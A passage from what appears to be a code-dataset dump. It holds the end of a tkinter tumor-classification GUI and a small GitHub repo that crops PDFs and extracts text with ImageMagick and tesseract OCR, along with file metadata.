text=\"Training Completed\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 13, ' 
bold ') ) \r\n lbl.place(x=850, y=355)\r\n #print(pandas.read_excel('xlwt example.xls'))\r\ndef classifier():\r\n global contrast,energy,homogeneity,correlation\r\n df = pd.read_csv(\"xlwt example.csv\")\r\n y=df.out\r\n x=df.drop('out',axis=1)\r\n print(x)\r\n print(y)\r\n x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state = 1)\r\n clf=MLPClassifier()\r\n model=clf.fit(x_train,y_train)\r\n predication=model.predict([[contrast,energy,homogeneity,correlation]])\r\n print(predication)\r\n lbl = tk.Label(window, text=\"Result:\",width=20 ,height=2 ,fg=\"black\" ,font=('times', 13, ' bold ') ) \r\n lbl.place(x=850, y=420)\r\n message = tk.Label(window, text=predication ,fg=\"red\" ,width=30 ,height=2 ,font=('times', 13, ' bold ')) \r\n message.place(x=980, y=420)\r\n\r\ncanvas1 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas1.place(x=50,y=200)\r\ncanvas2 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas2.place(x=250,y=200)\r\ncanvas3 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas3.place(x=450,y=200)\r\ncanvas4 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas4.place(x=50,y=200)\r\n\r\nbtn1=Button(text='Load Image', command=answer,width=10 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn1.place(x=50,y=500)\r\nbtn2=Button(text='Rgb2gary', command=rgb2gray,width=10 ,height=2 ,activebackground = \"Green\" ,font=('times', 15, ' bold '))\r\nbtn2.place(x=200,y=500)\r\nbtn3=Button(text='Gray Thr', command=Thresholding,width=10 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn3.place(x=350,y=500)\r\nbtn4=Button(text='find Tumor', command=detect,width=10 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn4.place(x=500,y=500)\r\nbtn5=Button(text='Feature Extraction',command=Feature_extraction,width=15 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn5.place(x=650,y=500)\r\nbtn6=Button(text='Train Dataset',command=Train_data,width=15 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn6.place(x=860,y=500)\r\nbtn7=Button(text='Classifiaction',command=classifier,width=15 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn7.place(x=1070,y=500)\r\n# Load an image using OpenCV\r\n\r\n" } ]
2
JingwenX/python_ocr_extract_info_from_pdf
https://github.com/JingwenX/python_ocr_extract_info_from_pdf
80b67a7b50064b9ed080d8674f644514636c3965
4f253d58b5fee136548bd41bc8e2d3462e4d18e9
d90547e0d0fd323e183259992fb0d0ef7c8bd9a2
refs/heads/master
2020-03-19T14:25:14.164405
2018-06-08T13:32:05
2018-06-08T13:32:05
136,621,786
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7291169166564941, "alphanum_fraction": 0.7517899870872498, "avg_line_length": 33.91666793823242, "blob_id": "e030780ca58b903c63fadfcb100efcfc6571292a", "content_id": "4ab30ab72371f93b269afcde30424670691e99e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 838, "license_type": "no_license", "max_line_length": 92, "num_lines": 24, "path": "/README.md", "repo_name": "JingwenX/python_ocr_extract_info_from_pdf", "src_encoding": "UTF-8", "text": "# How to use\n1. download this repo.\n2. put your PDF file, named in.pdf, in the same folder.\n3. Specify the \"crop box\" you would like the information to be extracted in \n4. run python2 cropAccountNoFromPDF\n5. Information will be in the output.txt! Yay!\n\n# Dependencies\n## Homebrew manage package:\n1. brew install tesseract\n2. brew install ImageMagick\n## Python Package: PyPDF2\n1. pip install PyPDF2\n\n# Operation: what the program will do\n1. crop PDF (in.pdf) to a small PDF with the size you \n2. convert PDF to tiff\n3. OCR to get the information you need from the tiff\n4. write the OCR output into output.txt\n\n# Future Upgrades (TODO):\n0. before upload, pop up window letting user enter page, media box and crop box number.\n1. pop up a PDF Viewer to let user choose which part (page, media box and crop box) to crop.\n2. upgrade to python3\n" }, { "alpha_fraction": 0.595174252986908, "alphanum_fraction": 0.6152815222740173, "avg_line_length": 29.4489803314209, "blob_id": "a81b1e4fd8767e703bf9684fbd61c223e40711cf", "content_id": "e20a620e4281110bd3e2ef657f13d9d55d426cd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1492, "license_type": "no_license", "max_line_length": 70, "num_lines": 49, "path": "/cropFromPDF.py", "repo_name": "JingwenX/python_ocr_extract_info_from_pdf", "src_encoding": "UTF-8", "text": "from PyPDF2 import PdfFileReader, utils, PdfFileWriter\nfrom StringIO import StringIO\nimport subprocess\nfrom subprocess import call\nimport callCommandTest as cct\n\n\ninput_path = 'in.pdf'\n\ndef decompress_pdf(temp_buffer):\n temp_buffer.seek(0) # Make sure we're at the start of the file.\n\n process = subprocess.Popen(['pdftk.exe',\n '-', # Read from stdin.\n 'output',\n '-', # Write to stdout.\n 'uncompress'],\n stdin=temp_buffer,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n return StringIO(stdout)\n\nwith open(input_path, 'rb') as input_file:\n input_buffer = StringIO(input_file.read())\n\ntry:\n input_pdf = PdfFileReader(input_buffer)\nexcept utils.PdfReadError:\n input_pdf = PdfFileReader(decompress_pdf(input_file))\n\noutput = PdfFileWriter()\n\nnumPages = input_pdf.getNumPages()\nprint \"document has %s pages.\" % numPages\n\n# for i in range(numPages):\npage = input_pdf.getPage(0)\nprint page.mediaBox.getUpperRight_x(), page.mediaBox.getUpperRight_y()\npage.trimBox.lowerLeft = (225, 200)\npage.trimBox.upperRight = (25, 1000)\npage.cropBox.lowerLeft = (350, 100) #x, y\npage.cropBox.upperRight = (800, 140) #go low 140\noutput.addPage(page)\n\nwith open(\"out.pdf\", \"wb\") as out_f:\n output.write(out_f)\ncct.getDigit()\n" }, { "alpha_fraction": 0.7161716222763062, "alphanum_fraction": 0.7227723002433777, "avg_line_length": 22.346153259277344, "blob_id": "ff10834d229b3574a988e5d572a9f10590a53401", "content_id": "59554411ea8c01de3499b53e7b76174ab61c6646", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 101, "num_lines": 26, "path": "/callCommandTest.py", "repo_name": "JingwenX/python_ocr_extract_info_from_pdf", "src_encoding": "UTF-8", "text": "import subprocess\nfrom subprocess import call\n\ndef getDigit():\n\t\n\n\tconvertToImg = 'convert -density 300 out.pdf -depth 8 -strip -background white -alpha off file.tiff'\n\textractDigit = 'tesseract file.tiff output.txt'\n\tp = subprocess.Popen(convertToImg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\tretval = p.wait()\n\t# extractDigit\n\te = subprocess.Popen(extractDigit, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n\n# (output, err) = e.communicate()\n# for line in p.stdout.readlines():\n# print line,\n\n\"\"\"\nAnother Way\n\"\"\"\n\"\"\"\nimport os\ncmd = 'ls -al'\nos.system(cmd)\n\"\"\"" } ]
3